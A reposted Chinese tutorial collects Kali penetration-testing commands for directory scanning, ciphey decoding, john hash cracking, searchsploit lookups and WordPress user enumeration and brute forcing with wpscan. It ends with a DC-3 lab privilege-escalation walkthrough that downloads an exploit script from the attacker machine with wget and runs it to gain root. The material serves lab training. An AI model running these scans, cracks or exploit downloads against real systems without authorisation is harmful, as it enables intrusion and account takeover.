常用网安渗透工具及命令(扫目录、解密爆破、漏洞信息搜索)

目录

dirsearch:

dirmap:

输入目标

文件读取

ciphey(很强的一个自动解密工具):

john(破解密码):

whatweb指纹识别:

searchsploit:

例1:

例2:

例3(DC-3靶场的提权例子):

wpscan

常用参数

wpscan扫描


感觉扫目录dirmap>dirsearch>御剑,我工具都是按在kali上的,命令也是在kali上使用

dirsearch:

kali下载:

git clone https://github.com/maurosoria/dirsearch.git

忘了要不要先下载python3,不过都学网安了,没下早晚也要下:

sudo apt install python3

常用参数:

  • -w--wordlist: 指定要使用的字典文件路径,用于构建扫描路径。可以使用自定义的字典文件。
  • -r--recursive: 启用递归扫描,递归地扫描子目录。
  • -t--threads: 指定线程数量,控制请求速率。
  • -x--exclude-status: 指定要排除的HTTP状态码,用逗号分隔。例如:301,403。默认情况下,不会排除任何状态码。
  • -b--cookie: 指定请求中要包含的Cookie。
  • -H--header: 指定请求中要包含的其他标头,用冒号分隔键值对。例如:User-Agent:Mozilla/5.0
  • -a--user-agent: 指定请求中的用户代理标头。
  • --random-agent: 在每个请求中使用随机的用户代理标头。
  • --delay 5:表示每个请求之间延迟5秒。

例1:

dirsearch -u 192.168.120.132 -e * -i 200

只显示状态码200

-i 状态码 #只显示该状态码

-x 状态码 #不显示该状态码

-e * 表示指定要搜索的文件扩展名。在这里使用通配符 * 表示搜索所有类型的文件

例2:

dirsearch.py -u http://example.com -r --delay 5      #递归扫描,每五秒发送一次

例3:

dirsearch -u http://xxxx -r -t 30         #30个线程扫描扫描

例4:

dirsearch -u http://xxxx -r -t 30 --proxy 127.0.0.1:8080        #代理扫

dirmap:

输入目标

单目标,默认为http

python3 dirmap.py -i https://target.com -lcf
python3 dirmap.py -i 192.168.1.1 -lcf

子网(CIDR格式)

python3 dirmap.py -i 192.168.1.0/24 -lcf

网络范围

python3 dirmap.py -i 192.168.1.1-192.168.1.100 -lcf

文件读取

python3 dirmap.py -iF targets.txt -lcf

结果保存:

  1. 结果将自动保存在项目根目录下的output文件夹中

  2. 每一个目标生成一个txt,命名格式为目标域名.txt

  3. 结果自动去重复,不用担心产生大量冗余

ciphey(很强的一个自动解密工具):

Ciphey - 自动解密工具 ,下载:https://github.com/ciphey/ciphey

kali下载(如果不成功检查一下有没有下python3和pip):

apt install python3-ciphey

cipher是一种使用智能人工智能的自动解密工具和自然语言处理。输入加密文本,获取解密文本

基本用法: 
ciphey -t "aGVsbG8gbXkgbmFtZSBpcyBiZWU="

参数选项:

  -t, --text TEXT            您想要解密的密文。-q, --quiet                减少冗长的显示,直接给结果-g, --greppable            只输出答案(对于grep很有用)-v, --verbose-C, --checker TEXT         使用给定的检查器-c, --config TEXT          使用给定的配置文件。默认为appdirs.user_config_dir('ciphey','ciphey')/'config.yml'
​-w, --wordlist TEXT        使用给定的密码字典-p, --param TEXT           将参数传递给语言检查器-l, --list-params BOOLEAN  列出所选模块的参数--searcher TEXT            选择要使用的搜索算法-b, --bytes                强制密码使用二进制模式作为输入--default-dist TEXT        设置默认的字符/字节分布-m, --module PATH          从给定路径添加模块-A, --appdirs              输出密码到想要的文件位置
​-f, --file FILENAME--help                     显示此帮助消息并退出。

john(破解密码):

先在桌面创建一个文件,将上面的hash密码复制进去并保存,接着使用john指向该文件

john /root/桌面/passwd 

img

密码是snoopy

-incremental :使用遍历模式,就是使用字幕数字等组合密码的所有可能情况,一般不用,太浪费时间。如果你电脑速度够快又有足够的时间,可以来使用这种方式,这是威力最大的方式。

whatweb指纹识别:

kali自带,基本语法:
whatweb -v 192.168.183.147

searchsploit:

是一款kali自带的搜索漏洞信息的模块

   -c, --case     [Term]      区分大小写(默认不区分大小写)-e, --exact    [Term]      对exploit标题进行EXACT匹配 (默认为 AND) [Implies "-t"].-h, --help                 显示帮助-j, --json     [Term]      以JSON格式显示结果-m, --mirror   [EDB-ID]    把一个exp拷贝到当前工作目录,参数后加目标id-o, --overflow [Term]      Exploit标题被允许溢出其列-p, --path     [EDB-ID]    显示漏洞利用的完整路径(如果可能,还将路径复制到剪贴板),后面跟漏洞ID号-t, --title    [Term]      仅仅搜索漏洞标题(默认是标题和文件的路径)-u, --update               检查并安装任何exploitdb软件包更新(deb或git)-w, --www      [Term]      显示Exploit-DB.com的URL而不是本地路径(在线搜索)-x, --examine  [EDB-ID]    使用$ PAGER检查(副本)Exp--colour               搜索结果不高亮显示关键词--id                   显示EDB-ID--nmap     [file.xml]  使用服务版本检查Nmap XML输出中的所有结果(例如:nmap -sV -oX file.xml)使用“-v”(详细)来尝试更多的组合--exclude="term"       从结果中删除值。通过使用“|”分隔多个值例如--exclude=“term1 | term2 | term3”。

例1:

searchsploit joomla 3.7.0

当前cms存在SQL注入的漏洞,还有跨站扫描漏洞,我们看一下SQL注入的,该漏洞的完整path是

/usr/share/exploitdb/exploits/php/webapps/42033.txt

拷贝漏洞的详细信息到桌面,cp 要拷贝的文件 拷贝后的文件

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /root/桌面/42033.txt

在桌面打开该文件

给出了注入点

例2:

找到4.4.x的漏洞 后面对应Privilege Escalation(提权)

searchsploit Ubuntu 16.04

找到对应版本号后面的路径,然后直接查看漏洞路径

searchsploit -p 39772.txt

┌──(kali㉿kali)-[~]
└─$ searchsploit -p 39772.txtExploit: Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege EscalationURL: https://www.exploit-db.com/exploits/39772Path: /usr/share/exploitdb/exploits/linux/local/39772.txtCodes: CVE-2016-4557, 823603

复制到桌面:

cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/桌面/39772.txt

打开桌面上的39772.txt文件,最后一行附上了exp链接

物理机访问最后一行网址,下载exp解压后是一个叫39772的文件,把文件拖进虚拟机桌面上

例3(DC-3靶场的提权例子):

可以用exim4提权,先查看exim4版本

    exim4 --version

和上一个靶场一样,这里可以使用searchsploit

    searchsploit exim 4

出来的结果很多,我们使用46996.sh

"Local Privilege E"表示本地特权升级漏洞;"Remote Command Ex"表示远程命令执行漏洞;"Denial of Service"表示拒绝服务漏洞等等

先打开Apache服务:

    systemctl start apache2.service

把脚本复制到html下

     cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html

Charles用户那边用 wget命令下载这个脚本

    charles@dc-4:/$ wget http://192.168.233.130/46996.sh

但是下载失败,转去/tmp目录下下载

    cd /tmp

    wget http://192.168.233.130/46996.sh

ls -l查看脚本权限,发现没有执行权限,我们需要给脚本加执行权限

    chmod +x 46996.sh

执行脚本:

    ./46996.sh

 然后whoami发现已经为root

具体的DC-3靶场下载及wp:https://blog.csdn.net/2301_76690905/article/details/135050091

wpscan

该扫描器可以实现获取Wordpress站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。

常用参数
–update 更新到最新版本
–url | -u 要扫描的WordPress站点.
–force | -f 不检查网站运行的是不是WordPress
–enumerate | -e [option(s)] 枚举
wpscan扫描
1、扫描WordPress漏洞、版本、ip等信息
wpscan --url http://www.xxxxx.top/
2、扫描枚举wordpress用户
wpscan --url http://www.xxxxx.top/ --enumerate u
3、扫描主题
wpscan --url http://www.xxxxx.top/ --enumerate t
4、扫描插件漏洞
wpscan --urlhttp://www.xxxxx.top/ --enumerate p
5、使用WPScan进行暴力破解在进行暴力破解攻击之前,我们需要创建对应的字典文件。输入下列命令:
wpscan --url https://www.xxxxx.top/-e u --wordlist /root/桌面/password.txt
6、暴力破解用户密码
wpscan --url dc-2 user.txt -P passwd.txt
7、wpscan --ignore-main-redirect --url 192.168.1.8 --enumerate u --force
  • --ignore-main-redirect:该参数可用于忽略网站中可能存在的主要的页面重定向,以确保扫描结果的准确性。

  • --url:该参数用于指定要扫描的 WordPress 网站的 URL 地址。在本例中,扫描的目标是位于本地网络中的地址为 "192.168.1.8" 的 WordPress 网站。

  • --enumerate u:该参数用于枚举所有的 WordPress 用户,以便查看是否存在弱密码或其他安全风险。

  • --force:该参数用于在可能存在风险的情况下,仍然尝试对目标进行攻击和渗透测试。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/219657.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

<JavaEE> 网络编程 -- 网络通信基础(协议和协议分层、数据封装和分用)

目录 一、IP地址 1)IP地址的概念 2)IP地址的格式 二、端口号 1)端口号的概念 2)端口号的格式 3)什么是知名端口号? 三、协议 1)协议的概念 2)协议的作用 3)TC…

【idea】解决sprintboot项目创建遇到的问题

目录 一、报错Plugin ‘org.springframework.boot:spring-boot-maven-plugin:‘ not found 二、报错java: 错误: 无效的源发行版:17 三、java: 无法访问org.springframework.web.bind.annotation.CrossOrigin 四、整合mybatis的时候,报java.lang.Ill…

人工智能中的核心概念

1 概述 人工智能英文缩写为AI,是一种由人制造出来的机器,该机器可以模仿人的思想和行为,从而体现出一种智能的反应。 人工智能的产业链分为基础层、技术层、应用层三个层次。 基础层包括:芯片、大数据、算法系统、网络等多项基础…

基于Tkinter和OpenCV的目标检测程序源码+权重文件,实现摄像头和视频文件的实时目标检测采用YOLOv8模型进行目标检测

基于Tkinter和OpenCV的目标检测程序源码权重文件,实现摄像头和视频文件的实时目标检测采用YOLOv8模型进行目标检测 项目描述 本项目是一个基于Tkinter和OpenCV的目标检测应用程序,实现了摄像头和视频文件的实时目标检测。通过YOLOv8模型进行目标检测&a…

ShuffleNet V1+V2(pytorch)

V1 V1根本思想: 1.GConv替换resnet的普通1*1Conv 2.GConv后加channel shuffle模块 对GConv的不同组进行重新组合。channel_shuffle a是resnet模块,b,c是ShuffleNetV1的block,在V1版中,两模块branch2的第一个1*1卷积…

JavaScript 事件冒泡与捕获机制 --- 带动态图理解

&#xff08;1&#xff09;.事件捕获 从根元素往上传递 --- ---&#xff08;由外到内&#xff09; &#xff08;2&#xff09;.事件冒泡 从元素传递到它的根源素 --- --- &#xff08;由内到外&#xff09; 代码&#xff1a; <!DOCTYPE html> <html lang"en&q…

在 Windows 11/10 上恢复已删除文本文件的 4 种方法

您是否不小心从桌面上删除了文本文件&#xff1f;不用担心。您可以在 Windows 上恢复已删除的文本文件&#xff01; 对于那些有大量工作要做的人来说&#xff0c;便利贴无疑是一种福音。便利贴能够立即记下任何内容并使其可见&#xff0c;而不会占用太多屏幕空间&#xff0c;因…

vue写了这么久了您是否知道:为什么data属性是一个函数而不是一个对象?

一、实例和组件定义data的区别 vue实例的时候定义data属性既可以是一个对象&#xff0c;也可以是一个函数 const app new Vue({el:"#app",// 对象格式data:{foo:"foo"},// 函数格式data(){return {foo:"foo"}} })组件中定义data属性&#xff…

Vue 项目关于在生产环境下调试

前言 开发项目时&#xff0c;在本地调试没问题&#xff0c;但是部署到生产会遇到一些很奇怪的问题&#xff0c;本地又没法调&#xff0c;就需要在生产环境/域名下进行调试。 在这里介绍一个插件Vue force dev ,浏览器扩展里下载 即便是设置了Vue.config.devtoolsfalse 只要安…

【Spark面试】Spark面试题答案

目录 1、spark的有几种部署模式&#xff0c;每种模式特点&#xff1f;&#xff08;☆☆☆☆☆&#xff09; 2、Spark为什么比MapReduce块&#xff1f;&#xff08;☆☆☆☆☆&#xff09; 3、简单说一下hadoop和spark的shuffle相同和差异&#xff1f;&#xff08;☆☆☆☆☆…

音视频技术开发周刊 | 324

每周一期&#xff0c;纵览音视频技术领域的干货。 新闻投稿&#xff1a;contributelivevideostack.com。 467亿参数MoE追平GPT-3.5&#xff01;爆火开源Mixtral模型细节首公开&#xff0c;中杯逼近GPT-4 今天&#xff0c;Mistral AI公布了Mixtral 8x7B的技术细节&#xff0c;不…

为开发者设计的幻灯片演示工具Slidev

什么是 Slidev &#xff1f; Slidev 是专为程序员打造的演示文稿工具。该项目是基于 Web 的幻灯片制作和演示工具&#xff0c;让用户可以使用 纯文本 Markdown 语法制作幻灯片&#xff0c;支持导出为 PDF 或 PNG 格式的文件&#xff0c;或以单页面展示幻灯片。对于大多数不擅长…

如何使用ArcGIS Pro裁剪影像

对影像进行裁剪是一项比较常规的操作&#xff0c;因为到手的影像可能是多种范围&#xff0c;需要根据自己需求进行裁剪&#xff0c;这里为大家介绍一下ArcGIS Pro中裁剪的方法&#xff0c;希望能对你有所帮助。 数据来源 本教程所使用的数据是从水经微图中下载的影像和行政区…

C语言—小小圣诞树

这个代码会询问用户输入圣诞树的高度&#xff0c;然后根据输入的高度在控制台上显示相应高度的圣诞树。 #include <stdio.h>int main() {int height, spaces, stars;printf("请输入圣诞树的高度: ");scanf("%d", &height);spaces height - 1;st…

Postman介绍和快速使用

Postman 是什么&#xff1f; Postman 是一个流行的API&#xff08;Application Programming Interface&#xff09;开发工具&#xff0c;它使得开发者可以很容易地创建、测试、共享和文档化API。Postman 提供了一个友好的用户界面&#xff0c;来发送HTTP请求&#xff0c;接收响…

容器技术:从虚拟机到轻量级容器的革命

一、引言 首先&#xff0c;什么是容器&#xff1f; 容器是一种沙盒技术&#xff0c;主要目的是为了将应用运行在其中&#xff0c;与外界隔离&#xff1b;及方便这个沙盒可以被转移到其它宿主机器。本质上&#xff0c;它是一个特殊的进程。通过名称空间&#xff08;Namespace&a…

解析视频美颜SDK的算法:美肤、滤镜与实时处理

如今&#xff0c;美颜技术在视频处理中扮演着关键的角色&#xff0c;为用户提供更加精致的视觉体验。本文将深入探讨视频美颜SDK的算法&#xff0c;聚焦于美肤、滤镜与实时处理等方面&#xff0c;揭示背后的科技奥秘。 一、美肤算法的魅力 视频美颜的一个核心功能就是美肤&am…

实现el-table操作列点击弹出echarts

代码&#xff1a; <el-table-column :width"90"><template #default"scope"><el-popover placement"left-end" width"550" trigger"click"><div><div style"font-size: 18px; margin-left…

Kotlin 笔记 -- Kotlin 语言特性的理解(二)

都是编译成字节码&#xff0c;为什么 Kotlin 能支持 Java 中没有的特性&#xff1f; kotlin 有哪些 Java 中没有的特性&#xff1a; 类型推断、可变性、可空性自动拆装箱、泛型数组高阶函数、DSL顶层函数、扩展函数、内联函数伴生对象、数据类、密封类、单例类接口代理、inter…

音频I2S

前言 基于网上资料对相关概念做整理汇总&#xff0c;部分内容引用自文后文章。 学习目标&#xff1a;简单了解相关概念、相关协议。 1 概述 数字音频接口DAI&#xff0c;即Digital Audio Interfaces&#xff0c;顾名思义&#xff0c;DAI表示在板级或板间传输数字音频信…